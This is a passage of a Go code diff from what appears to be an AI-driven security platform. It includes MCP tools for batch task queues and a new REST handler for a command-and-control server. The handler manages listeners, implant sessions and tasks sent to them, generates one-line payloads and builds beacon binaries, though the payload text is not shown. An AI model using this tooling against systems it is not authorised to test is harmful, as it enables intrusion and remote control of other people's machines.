(*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + queue, exists := h.batchTaskManager.GetBatchQueue(qid) + if !exists { + return batchMCPTextResult("队列不存在: "+qid, true), nil + } + if queue.Status == "running" { + return batchMCPTextResult("队列正在运行中,无法修改调度配置", true), nil + } + scheduleMode := normalizeBatchQueueScheduleMode(mcpArgString(args, "schedule_mode")) + cronExpr := strings.TrimSpace(mcpArgString(args, "cron_expr")) + var nextRunAt *time.Time + if scheduleMode == "cron" { + if cronExpr == "" { + return batchMCPTextResult("Cron 调度模式下 cron_expr 不能为空", true), nil + } + sch, err := h.batchCronParser.Parse(cronExpr) + if err != nil { + return batchMCPTextResult("无效的 Cron 表达式: "+err.Error(), true), nil + } + n := sch.Next(time.Now()) + nextRunAt = &n + } + h.batchTaskManager.UpdateQueueSchedule(qid, scheduleMode, cronExpr, nextRunAt) + updated, _ := h.batchTaskManager.GetBatchQueue(qid) + logger.Info("MCP batch_task_update_schedule", zap.String("queueId", qid), zap.String("scheduleMode", scheduleMode), zap.String("cronExpr", cronExpr)) + return batchMCPJSONResult(updated) + }) + + // --- schedule enabled --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskScheduleEnabled, + Description: `设置是否允许 Cron 自动触发该队列。关闭后仍保留 Cron 表达式,仅停止定时自动跑;可用手工「启动」执行。 +仅对 schedule_mode 为 cron 的队列有意义。 + +⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求开关批量任务自动调度时才可调用。不要在用户未要求时自行调用。`, + ShortDescription: "开关批量任务 Cron 自动调度", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + "schedule_enabled": map[string]interface{}{ + "type": "boolean", + "description": "true 允许定时触发,false 仅手工执行", + }, + }, + "required": []string{"queue_id", "schedule_enabled"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + if qid == "" { + return batchMCPTextResult("queue_id 不能为空", true), nil + } + en, ok := mcpArgBool(args, "schedule_enabled") + if !ok { + return batchMCPTextResult("schedule_enabled 必须为布尔值", true), nil + } + if _, exists := h.batchTaskManager.GetBatchQueue(qid); !exists { + return batchMCPTextResult("队列不存在", true), nil + } + if !h.batchTaskManager.SetScheduleEnabled(qid, en) { + return batchMCPTextResult("更新失败", true), nil + } + queue, _ := h.batchTaskManager.GetBatchQueue(qid) + logger.Info("MCP batch_task_schedule_enabled", zap.String("queueId", qid), zap.Bool("enabled", en)) + return batchMCPJSONResult(queue) + }) + + // --- add task --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskAdd, + Description: "向处于 pending 状态的队列追加一条子任务。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求向批量任务队列添加子任务时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "批量队列添加子任务", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + "message": map[string]interface{}{ + "type": "string", + "description": "任务指令内容", + }, + }, + "required": []string{"queue_id", "message"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + msg := strings.TrimSpace(mcpArgString(args, "message")) + if qid == "" || msg == "" { + return batchMCPTextResult("queue_id 与 message 均不能为空", true), nil + } + task, err := h.batchTaskManager.AddTaskToQueue(qid, msg) + if err != nil { + return batchMCPTextResult(err.Error(), true), nil + } + queue, _ := h.batchTaskManager.GetBatchQueue(qid) + logger.Info("MCP batch_task_add_task", zap.String("queueId", qid), zap.String("taskId", task.ID)) + return batchMCPJSONResult(map[string]interface{}{"task": task, "queue": queue}) + }) + + // --- update task --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskUpdate, + Description: "修改 pending 队列中仍为 pending 的子任务文案。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求修改批量子任务内容时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "更新批量子任务内容", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + "task_id": map[string]interface{}{ + "type": "string", + "description": "子任务 ID", + }, + "message": map[string]interface{}{ + "type": "string", + "description": "新的任务指令", + }, + }, + "required": []string{"queue_id", "task_id", "message"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + tid := mcpArgString(args, "task_id") + msg := strings.TrimSpace(mcpArgString(args, "message")) + if qid == "" || tid == "" || msg == "" { + return batchMCPTextResult("queue_id、task_id、message 均不能为空", true), nil + } + if err := h.batchTaskManager.UpdateTaskMessage(qid, tid, msg); err != nil { + return batchMCPTextResult(err.Error(), true), nil + } + queue, _ := h.batchTaskManager.GetBatchQueue(qid) + logger.Info("MCP batch_task_update_task", zap.String("queueId", qid), zap.String("taskId", tid)) + return batchMCPJSONResult(queue) + }) + + // --- remove task --- + reg(mcp.Tool{ + Name: builtin.ToolBatchTaskRemove, + Description: "从 pending 队列中删除仍为 pending 的子任务。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确要求删除批量子任务时才可调用。不要在用户未要求时自行调用。", + ShortDescription: "删除批量子任务", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "queue_id": map[string]interface{}{ + "type": "string", + "description": "队列 ID", + }, + "task_id": map[string]interface{}{ + "type": "string", + "description": "子任务 ID", + }, + }, + "required": []string{"queue_id", "task_id"}, + }, + }, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + qid := mcpArgString(args, "queue_id") + tid := mcpArgString(args, "task_id") + if qid == "" || tid == "" { + return batchMCPTextResult("queue_id 与 task_id 均不能为空", true), nil + } + if err := h.batchTaskManager.DeleteTask(qid, tid); err != nil { + return batchMCPTextResult(err.Error(), true), nil + } + queue, _ := h.batchTaskManager.GetBatchQueue(qid) + logger.Info("MCP batch_task_remove_task", zap.String("queueId", qid), zap.String("taskId", tid)) + return batchMCPJSONResult(queue) + }) + + logger.Info("批量任务 MCP 工具已注册", zap.Int("count", 12)) +} + +// --- batch_task_list 精简结构(避免把每条子任务的 result 等大段文本塞进列表上下文) --- + +const mcpBatchListTaskMessageMaxRunes = 160 + +// batchTaskMCPListSummary 列表中的子任务摘要(完整字段用 batch_task_get) +type batchTaskMCPListSummary struct { + ID string `json:"id"` + Status string `json:"status"` + Message string `json:"message,omitempty"` +} + +// batchTaskQueueMCPListItem 列表中的队列摘要 +type batchTaskQueueMCPListItem struct { + ID string `json:"id"` + Title string `json:"title,omitempty"` + Role string `json:"role,omitempty"` + AgentMode string `json:"agentMode"` + ScheduleMode string `json:"scheduleMode"` + CronExpr string `json:"cronExpr,omitempty"` + NextRunAt *time.Time `json:"nextRunAt,omitempty"` + ScheduleEnabled bool `json:"scheduleEnabled"` + LastScheduleTriggerAt *time.Time `json:"lastScheduleTriggerAt,omitempty"` + Status string `json:"status"` + CreatedAt time.Time `json:"createdAt"` + StartedAt *time.Time `json:"startedAt,omitempty"` + CompletedAt *time.Time `json:"completedAt,omitempty"` + CurrentIndex int `json:"currentIndex"` + TaskTotal int `json:"task_total"` + TaskCounts map[string]int `json:"task_counts"` + Tasks []batchTaskMCPListSummary `json:"tasks"` +} + +func truncateStringRunes(s string, maxRunes int) string { + if maxRunes <= 0 { + return "" + } + n := 0 + for i := range s { + if n == maxRunes { + out := strings.TrimSpace(s[:i]) + if out == "" { + return "…" + } + return out + "…" + } + n++ + } + return s +} + +const mcpBatchListMaxTasksPerQueue = 200 // 列表中每个队列最多返回的子任务摘要数 + +func toBatchTaskQueueMCPListItem(q *BatchTaskQueue) batchTaskQueueMCPListItem { + counts := map[string]int{ + "pending": 0, + "running": 0, + "completed": 0, + "failed": 0, + "cancelled": 0, + } + tasks := make([]batchTaskMCPListSummary, 0, len(q.Tasks)) + for _, t := range q.Tasks { + if t == nil { + continue + } + counts[t.Status]++ + // 列表视图限制子任务摘要数量,完整列表通过 batch_task_get 查看 + if len(tasks) < mcpBatchListMaxTasksPerQueue { + tasks = append(tasks, batchTaskMCPListSummary{ + ID: t.ID, + Status: t.Status, + Message: truncateStringRunes(t.Message, mcpBatchListTaskMessageMaxRunes), + }) + } + } + return batchTaskQueueMCPListItem{ + ID: q.ID, + Title: q.Title, + Role: q.Role, + AgentMode: q.AgentMode, + ScheduleMode: q.ScheduleMode, + CronExpr: q.CronExpr, + NextRunAt: q.NextRunAt, + ScheduleEnabled: q.ScheduleEnabled, + LastScheduleTriggerAt: q.LastScheduleTriggerAt, + Status: q.Status, + CreatedAt: q.CreatedAt, + StartedAt: q.StartedAt, + CompletedAt: q.CompletedAt, + CurrentIndex: q.CurrentIndex, + TaskTotal: len(tasks), + TaskCounts: counts, + Tasks: tasks, + } +} + +func batchMCPTextResult(text string, isErr bool) *mcp.ToolResult { + return &mcp.ToolResult{ + Content: []mcp.Content{{Type: "text", Text: text}}, + IsError: isErr, + } +} + +func batchMCPJSONResult(v interface{}) (*mcp.ToolResult, error) { + b, err := json.MarshalIndent(v, "", " ") + if err != nil { + return batchMCPTextResult(fmt.Sprintf("JSON 编码失败: %v", err), true), nil + } + return &mcp.ToolResult{Content: []mcp.Content{{Type: "text", Text: string(b)}}}, nil +} + +func batchMCPTasksFromArgs(args map[string]interface{}) ([]string, string) { + if raw, ok := args["tasks"]; ok && raw != nil { + switch t := raw.(type) { + case []interface{}: + out := make([]string, 0, len(t)) + for _, x := range t { + if s, ok := x.(string); ok { + if tr := strings.TrimSpace(s); tr != "" { + out = append(out, tr) + } + } + } + if len(out) > 0 { + return out, "" + } + } + } + if txt := mcpArgString(args, "tasks_text"); txt != "" { + lines := strings.Split(txt, "\n") + out := make([]string, 0, len(lines)) + for _, line := range lines { + if tr := strings.TrimSpace(line); tr != "" { + out = append(out, tr) + } + } + if len(out) > 0 { + return out, "" + } + } + return nil, "需要提供 tasks(字符串数组)或 tasks_text(多行文本,每行一条任务)" +} + +func mcpArgString(args map[string]interface{}, key string) string { + v, ok := args[key] + if !ok || v == nil { + return "" + } + switch t := v.(type) { + case string: + return strings.TrimSpace(t) + case float64: + return strings.TrimSpace(strconv.FormatFloat(t, 'f', -1, 64)) + case json.Number: + return strings.TrimSpace(t.String()) + default: + return strings.TrimSpace(fmt.Sprint(t)) + } +} + +func mcpArgFloat(args map[string]interface{}, key string) float64 { + v, ok := args[key] + if !ok || v == nil { + return 0 + } + switch t := v.(type) { + case float64: + return t + case int: + return float64(t) + case int64: + return float64(t) + case json.Number: + f, _ := t.Float64() + return f + case string: + f, _ := strconv.ParseFloat(strings.TrimSpace(t), 64) + return f + default: + return 0 + } +} + +func mcpArgBool(args map[string]interface{}, key string) (val bool, ok bool) { + v, exists := args[key] + if !exists { + return false, false + } + switch t := v.(type) { + case bool: + return t, true + case string: + s := strings.ToLower(strings.TrimSpace(t)) + if s == "true" || s == "1" || s == "yes" { + return true, true + } + if s == "false" || s == "0" || s == "no" { + return false, true + } + case float64: + return t != 0, true + } + return false, false +} diff --git a/internal/handler/c2.go b/internal/handler/c2.go new file mode 100644 index 00000000..78d48b32 --- /dev/null +++ b/internal/handler/c2.go @@ -0,0 +1,1003 @@ +package handler + +import ( + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "os" + "path/filepath" + "strconv" + "strings" + "sync/atomic" + "time" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "github.com/google/uuid" + "go.uber.org/zap" +) + +// C2Handler 处理 C2 相关的 REST API(manager 可在运行时置 nil 以关闭 C2) +type C2Handler struct { + mgrPtr atomic.Pointer[c2.Manager] + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *C2Handler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewC2Handler 创建 C2 处理器;manager 可为 nil(功能关闭时) +func NewC2Handler(manager *c2.Manager, logger *zap.Logger) *C2Handler { + h := &C2Handler{logger: logger} + if manager != nil { + h.mgrPtr.Store(manager) + } + return h +} + +func (h *C2Handler) mgr() *c2.Manager { + return h.mgrPtr.Load() +} + +// SetManager 运行时切换或清空 C2 Manager(与 App 启停同步) +func (h *C2Handler) SetManager(m *c2.Manager) { + h.mgrPtr.Store(m) +} + +// ============================================================================ +// 监听器 API +// ============================================================================ + +// ListListeners 获取监听器列表 +func (h *C2Handler) ListListeners(c *gin.Context) { + listeners, err := h.mgr().DB().ListC2Listeners() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + // 移除敏感字段 + for _, l := range listeners { + l.EncryptionKey = "" + l.ImplantToken = "" + } + c.JSON(http.StatusOK, gin.H{"listeners": listeners}) +} + +// CreateListener 创建监听器 +func (h *C2Handler) CreateListener(c *gin.Context) { + var req struct { + Name string `json:"name"` + Type string `json:"type"` + BindHost string `json:"bind_host"` + BindPort int `json:"bind_port"` + ProfileID string `json:"profile_id,omitempty"` + Remark string `json:"remark,omitempty"` + CallbackHost string `json:"callback_host,omitempty"` + Config *c2.ListenerConfig `json:"config,omitempty"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + input := c2.CreateListenerInput{ + Name: req.Name, + Type: req.Type, + BindHost: req.BindHost, + BindPort: req.BindPort, + ProfileID: req.ProfileID, + Remark: req.Remark, + Config: req.Config, + CallbackHost: strings.TrimSpace(req.CallbackHost), + } + + listener, err := h.mgr().CreateListener(input) + if err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + implantToken := listener.ImplantToken + listener.EncryptionKey = "" + listener.ImplantToken = "" + if h.audit != nil { + h.audit.RecordOK(c, "c2", "listener_create", "创建 C2 监听器", "c2_listener", listener.ID, map[string]interface{}{ + "name": listener.Name, "bind": listener.BindHost, "port": listener.BindPort, + }) + } + c.JSON(http.StatusOK, gin.H{"listener": listener, "implant_token": implantToken}) +} + +// GetListener 获取单个监听器 +func (h *C2Handler) GetListener(c *gin.Context) { + id := c.Param("id") + listener, err := h.mgr().DB().GetC2Listener(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + c.JSON(http.StatusOK, gin.H{"listener": listener}) +} + +// UpdateListener 更新监听器 +func (h *C2Handler) UpdateListener(c *gin.Context) { + id := c.Param("id") + listener, err := h.mgr().DB().GetC2Listener(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + + var req struct { + Name string `json:"name"` + BindHost string `json:"bind_host"` + BindPort int `json:"bind_port"` + ProfileID string `json:"profile_id"` + Remark string `json:"remark"` + CallbackHost *string `json:"callback_host"` + Config *c2.ListenerConfig `json:"config,omitempty"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + // 若监听器在运行,不能修改关键字段 + if h.mgr().IsListenerRunning(id) { + if req.BindHost != listener.BindHost || req.BindPort != listener.BindPort { + c.JSON(http.StatusConflict, gin.H{"error": "cannot modify bind address while listener is running"}) + return + } + } + + listener.Name = req.Name + listener.BindHost = req.BindHost + listener.BindPort = req.BindPort + listener.ProfileID = req.ProfileID + listener.Remark = req.Remark + if req.Config != nil { + cfgJSON, _ := json.Marshal(req.Config) + listener.ConfigJSON = string(cfgJSON) + } + if req.CallbackHost != nil { + cfg := &c2.ListenerConfig{} + raw := strings.TrimSpace(listener.ConfigJSON) + if raw == "" { + raw = "{}" + } + _ = json.Unmarshal([]byte(raw), cfg) + cfg.CallbackHost = strings.TrimSpace(*req.CallbackHost) + cfg.ApplyDefaults() + cfgJSON, err := json.Marshal(cfg) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + listener.ConfigJSON = string(cfgJSON) + } + + if err := h.mgr().DB().UpdateC2Listener(listener); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + c.JSON(http.StatusOK, gin.H{"listener": listener}) +} + +// DeleteListener 删除监听器 +func (h *C2Handler) DeleteListener(c *gin.Context) { + id := c.Param("id") + if err := h.mgr().DeleteListener(id); err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "c2", "listener_delete", "删除 C2 监听器", "c2_listener", id, nil) + } + c.JSON(http.StatusOK, gin.H{"deleted": true}) +} + +// StartListener 启动监听器 +func (h *C2Handler) StartListener(c *gin.Context) { + id := c.Param("id") + listener, err := h.mgr().StartListener(id) + if err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + listener.EncryptionKey = "" + listener.ImplantToken = "" + if h.audit != nil { + h.audit.RecordOK(c, "c2", "listener_start", "启动 C2 监听器", "c2_listener", id, nil) + } + c.JSON(http.StatusOK, gin.H{"listener": listener}) +} + +// StopListener 停止监听器 +func (h *C2Handler) StopListener(c *gin.Context) { + id := c.Param("id") + if err := h.mgr().StopListener(id); err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "c2", "listener_stop", "停止 C2 监听器", "c2_listener", id, nil) + } + c.JSON(http.StatusOK, gin.H{"stopped": true}) +} + +// ============================================================================ +// 会话 API +// ============================================================================ + +// ListSessions 获取会话列表 +func (h *C2Handler) ListSessions(c *gin.Context) { + filter := database.ListC2SessionsFilter{ + ListenerID: c.Query("listener_id"), + Status: c.Query("status"), + OS: c.Query("os"), + Search: c.Query("search"), + } + if limit := c.Query("limit"); limit != "" { + if n, err := strconv.Atoi(limit); err == nil && n > 0 { + filter.Limit = n + } + } + + sessions, err := h.mgr().DB().ListC2Sessions(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"sessions": sessions}) +} + +// GetSession 获取单个会话 +func (h *C2Handler) GetSession(c *gin.Context) { + id := c.Param("id") + session, err := h.mgr().DB().GetC2Session(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if session == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "session not found"}) + return + } + + // 获取最近任务 + tasks, _ := h.mgr().DB().ListC2Tasks(database.ListC2TasksFilter{ + SessionID: id, + Limit: 20, + }) + + c.JSON(http.StatusOK, gin.H{ + "session": session, + "tasks": tasks, + }) +} + +// DeleteSession 删除会话 +func (h *C2Handler) DeleteSession(c *gin.Context) { + id := c.Param("id") + if err := h.mgr().DB().DeleteC2Session(id); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "c2", "session_delete", "删除 C2 会话", "c2_session", id, nil) + } + c.JSON(http.StatusOK, gin.H{"deleted": true}) +} + +// SetSessionSleep 设置会话的 sleep/jitter +func (h *C2Handler) SetSessionSleep(c *gin.Context) { + id := c.Param("id") + var req struct { + SleepSeconds int `json:"sleep_seconds"` + JitterPercent int `json:"jitter_percent"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if err := h.mgr().DB().SetC2SessionSleep(id, req.SleepSeconds, req.JitterPercent); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"updated": true}) +} + +// ============================================================================ +// 任务 API +// ============================================================================ + +// ListTasks 获取任务列表 +func (h *C2Handler) ListTasks(c *gin.Context) { + filter := database.ListC2TasksFilter{ + SessionID: c.Query("session_id"), + Status: c.Query("status"), + } + + paginated := false + page := 1 + pageSize := 10 + if c.Query("page") != "" || c.Query("page_size") != "" { + paginated = true + if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 { + page = p + } + if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "10")); err == nil && ps > 0 { + pageSize = ps + if pageSize > 100 { + pageSize = 100 + } + } + filter.Limit = pageSize + filter.Offset = (page - 1) * pageSize + } else { + if limit := c.Query("limit"); limit != "" { + if n, err := strconv.Atoi(limit); err == nil && n > 0 { + filter.Limit = n + } + } + } + + tasks, err := h.mgr().DB().ListC2Tasks(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 仪表盘「待审任务」为全局 queued/pending 数量,与列表 session 过滤无关 + pendingN, _ := h.mgr().DB().CountC2TasksQueuedOrPending("") + + if !paginated { + c.JSON(http.StatusOK, gin.H{ + "tasks": tasks, + "pending_queued_count": pendingN, + }) + return + } + + total, err := h.mgr().DB().CountC2Tasks(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "tasks": tasks, + "total": total, + "page": page, + "page_size": pageSize, + "pending_queued_count": pendingN, + }) +} + +// DeleteTasks 批量删除任务(请求体 JSON: {"ids":["t_xxx",...]}) +func (h *C2Handler) DeleteTasks(c *gin.Context) { + var req struct { + IDs []string `json:"ids"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid json: " + err.Error()}) + return + } + if len(req.IDs) == 0 { + c.JSON(http.StatusBadRequest, gin.H{"error": "ids is required"}) + return + } + n, err := h.mgr().DB().DeleteC2TasksByIDs(req.IDs) + if err != nil { + if errors.Is(err, database.ErrNoValidC2TaskIDs) { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "c2", "task_delete", "批量删除 C2 任务", "c2_task", "", map[string]interface{}{ + "count": n, "ids": req.IDs, + }) + } + c.JSON(http.StatusOK, gin.H{"deleted": n}) +} + +// GetTask 获取单个任务 +func (h *C2Handler) GetTask(c *gin.Context) { + id := c.Param("id") + task, err := h.mgr().DB().GetC2Task(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if task == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "task not found"}) + return + } + c.JSON(http.StatusOK, gin.H{"task": task}) +} + +// CreateTask 创建任务 +func (h *C2Handler) CreateTask(c *gin.Context) { + var req struct { + SessionID string `json:"session_id"` + TaskType string `json:"task_type"` + Payload map[string]interface{} `json:"payload"` + Source string `json:"source"` + ConversationID string `json:"conversation_id"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + input := c2.EnqueueTaskInput{ + SessionID: req.SessionID, + TaskType: c2.TaskType(req.TaskType), + Payload: req.Payload, + Source: firstNonEmpty(req.Source, "manual"), + ConversationID: req.ConversationID, + UserCtx: c.Request.Context(), + } + + task, err := h.mgr().EnqueueTask(input) + if err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "c2", "task_create", "创建 C2 任务", "c2_task", task.ID, map[string]interface{}{ + "session_id": req.SessionID, "task_type": req.TaskType, + }) + } + c.JSON(http.StatusOK, gin.H{"task": task}) +} + +// CancelTask 取消任务 +func (h *C2Handler) CancelTask(c *gin.Context) { + id := c.Param("id") + if err := h.mgr().CancelTask(id); err != nil { + code := http.StatusInternalServerError + if e, ok := err.(*c2.CommonError); ok { + code = e.HTTP + } + c.JSON(code, gin.H{"error": err.Error()}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "c2", "task_cancel", "取消 C2 任务", "c2_task", id, nil) + } + c.JSON(http.StatusOK, gin.H{"cancelled": true}) +} + +// WaitTask 等待任务完成 +func (h *C2Handler) WaitTask(c *gin.Context) { + id := c.Param("id") + timeout := 60 * time.Second + if t := c.Query("timeout"); t != "" { + if n, err := strconv.Atoi(t); err == nil && n > 0 { + timeout = time.Duration(n) * time.Second + } + } + + deadline := time.Now().Add(timeout) + for time.Now().Before(deadline) { + task, err := h.mgr().DB().GetC2Task(id) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if task == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "task not found"}) + return + } + if task.Status == "success" || task.Status == "failed" || task.Status == "cancelled" { + c.JSON(http.StatusOK, gin.H{"task": task}) + return + } + time.Sleep(500 * time.Millisecond) + } + c.JSON(http.StatusRequestTimeout, gin.H{"error": "timeout waiting for task completion"}) +} + +// ============================================================================ +// Payload API +// ============================================================================ + +// PayloadOneliner 生成单行 payload +func (h *C2Handler) PayloadOneliner(c *gin.Context) { + var req struct { + ListenerID string `json:"listener_id"` + Kind string `json:"kind"` // bash, python, powershell, curl_beacon + Host string `json:"host"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + listener, err := h.mgr().DB().GetC2Listener(req.ListenerID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + + host := c2.ResolveBeaconDialHost(listener, strings.TrimSpace(req.Host), h.logger, listener.ID) + + kind := c2.OnelinerKind(req.Kind) + if !c2.IsOnelinerCompatible(listener.Type, kind) { + compatible := c2.OnelinerKindsForListener(listener.Type) + names := make([]string, len(compatible)) + for i, k := range compatible { + names[i] = string(k) + } + c.JSON(http.StatusBadRequest, gin.H{ + "error": fmt.Sprintf("监听器类型 %s 不支持 %s 类型的 oneliner,请选择兼容的类型", listener.Type, req.Kind), + "compatible_kinds": names, + }) + return + } + + input := c2.OnelinerInput{ + Kind: kind, + Host: host, + Port: listener.BindPort, + HTTPBaseURL: fmt.Sprintf("http://%s:%d", host, listener.BindPort), + ImplantToken: listener.ImplantToken, + } + + oneliner, err := c2.GenerateOneliner(input) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "oneliner": oneliner, + "kind": req.Kind, + "host": host, + "port": listener.BindPort, + }) +} + +// PayloadBuild 构建 beacon 二进制 +func (h *C2Handler) PayloadBuild(c *gin.Context) { + var req struct { + ListenerID string `json:"listener_id"` + OS string `json:"os"` + Arch string `json:"arch"` + SleepSeconds int `json:"sleep_seconds"` + JitterPercent int `json:"jitter_percent"` + Host string `json:"host"` // 可选:编译进 Beacon 的回连地址,覆盖监听器 bind_host + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + listener, err := h.mgr().DB().GetC2Listener(req.ListenerID) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if listener == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "listener not found"}) + return + } + + builder := c2.NewPayloadBuilder(h.mgr(), h.logger, "", "") + input := c2.PayloadBuilderInput{ + ListenerID: req.ListenerID, + OS: req.OS, + Arch: req.Arch, + SleepSeconds: req.SleepSeconds, + JitterPercent: req.JitterPercent, + Host: strings.TrimSpace(req.Host), + } + + result, err := builder.BuildBeacon(input) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "payload": result, + }) +} + +// PayloadDownload 下载 payload +func (h *C2Handler) PayloadDownload(c *gin.Context) { + id := c.Param("id") + filename := id + if !strings.HasPrefix(filename, "beacon_") { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"}) + return + } + if strings.Contains(filename, "/") || strings.Contains(filename, "\\") || strings.Contains(filename, "..") { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"}) + return + } + + builder := c2.NewPayloadBuilder(h.mgr(), h.logger, "", "") + storageDir := builder.GetPayloadStoragePath() + targetPath := filepath.Join(storageDir, filename) + + absTarget, err := filepath.Abs(targetPath) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid path"}) + return + } + absDir, err := filepath.Abs(storageDir) + if err != nil || !strings.HasPrefix(absTarget, absDir+string(filepath.Separator)) { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid payload id"}) + return + } + + c.FileAttachment(absTarget, filepath.Base(absTarget)) +} + +// ============================================================================ +// 事件 API +// ============================================================================ + +// ListEvents 获取事件列表 +func (h *C2Handler) ListEvents(c *gin.Context) { + filter := database.ListC2EventsFilter{ + Level: c.Query("level"), + Category: c.Query("category"), + SessionID: c.Query("session_id"), + TaskID: c.Query("task_id"), + } + if since := c.Query("since"); since != "" { + if t, err := time.Parse(time.RFC3339, since); err == nil { + filter.Since = &t + } + } + + paginated := false + page := 1 + pageSize := 10 + if c.Query("page") != "" || 